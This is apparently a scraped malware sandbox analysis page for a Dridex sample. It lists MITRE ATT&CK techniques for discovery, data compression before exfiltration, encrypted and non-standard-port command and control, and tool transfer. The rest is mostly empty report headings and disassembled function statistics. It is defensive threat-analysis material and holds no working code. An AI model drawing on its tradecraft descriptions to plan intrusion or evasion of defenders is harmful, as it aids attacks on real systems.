Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report K9jgh4owKk.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Code Manipulations

Statistics

Function 00405150, Relevance: 30.6, APIs: 14, Strings: 3, Instructions: 826
sleepCOMMONCrypto

Function 00413930, Relevance: 6.8, APIs: 4, Instructions: 834
COMMON

Function 00416C50, Relevance: 2.1, APIs: 1, Instructions: 584
libraryloaderCOMMON

Function 004339F9, Relevance: 1.7, APIs: 1, Instructions: 157
filenetworkCOMMON

Function 004122A0, Relevance: 1.6, APIs: 1, Instructions: 69
nativeCOMMON

Function 00417A60, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 004147B0, Relevance: 3.6, APIs: 2, Instructions: 618
COMMON

Function 00411030, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36
memoryCOMMON

Function 00433370, Relevance: 3.4, APIs: 2, Instructions: 366
networkCOMMON

Function 0042CAE0, Relevance: 3.2, APIs: 2, Instructions: 207
registryCOMMON

Function 0042C790, Relevance: 3.1, APIs: 2, Instructions: 85
registryCOMMON

Function 0042C2D0, Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Function 0041430F, Relevance: 1.7, APIs: 1, Instructions: 162
COMMON

Function 00433820, Relevance: 1.7, APIs: 1, Instructions: 151
networkCOMMON

Function 0042C580, Relevance: 1.6, APIs: 1, Instructions: 98
registryCOMMON

Function 0042C405, Relevance: 1.6, APIs: 1, Instructions: 83
registryCOMMON

Function 0040543B, Relevance: 1.6, APIs: 1, Instructions: 76
libraryCOMMON

Function 00427660, Relevance: 4.5, Strings: 3, Instructions: 793
COMMONCrypto

Function 00401570, Relevance: 3.6, Strings: 2, Instructions: 1143
COMMONCrypto

Function 0040ACD0, Relevance: 2.9, Strings: 1, Instructions: 1641
COMMONCrypto

Function 00423EC0, Relevance: 2.4, Strings: 1, Instructions: 1131
COMMONCrypto

Function 004262F0, Relevance: 2.2, Strings: 1, Instructions: 961
COMMONCrypto

Function 0041C590, Relevance: 2.1, Strings: 1, Instructions: 878
COMMONCrypto

Function 00422E60, Relevance: 2.0, Strings: 1, Instructions: 797
COMMONCrypto

Function 0041D030, Relevance: 2.0, Strings: 1, Instructions: 789
COMMONCrypto

Function 004289F0, Relevance: 2.0, Strings: 1, Instructions: 748
COMMONCrypto

Function 0041AE80, Relevance: 2.0, Strings: 1, Instructions: 719
COMMONCrypto

Function 0041B6F0, Relevance: 2.0, Strings: 1, Instructions: 704
COMMONCrypto

Function 0041A660, Relevance: 1.9, Strings: 1, Instructions: 690
COMMONCrypto

Function 00421EB0, Relevance: 1.9, Strings: 1, Instructions: 682
COMMONCrypto

Function 004226B0, Relevance: 1.9, Strings: 1, Instructions: 653
COMMONCrypto

Function 00421730, Relevance: 1.9, Strings: 1, Instructions: 649
COMMONCrypto

Function 00409E70, Relevance: 1.8, Strings: 1, Instructions: 591
COMMONCrypto

Function 00424CA0, Relevance: 1.6, Strings: 1, Instructions: 358
COMMONCrypto

Function 00406AD0, Relevance: .9, Instructions: 932
COMMONCrypto

Function 004250A0, Relevance: .8, Instructions: 835
COMMONCrypto

Function 00415B60, Relevance: .8, Instructions: 810
COMMONCrypto

Function 00427FC0, Relevance: .7, Instructions: 711
COMMONCrypto

Function 00418EF0, Relevance: .7, Instructions: 697
COMMONCrypto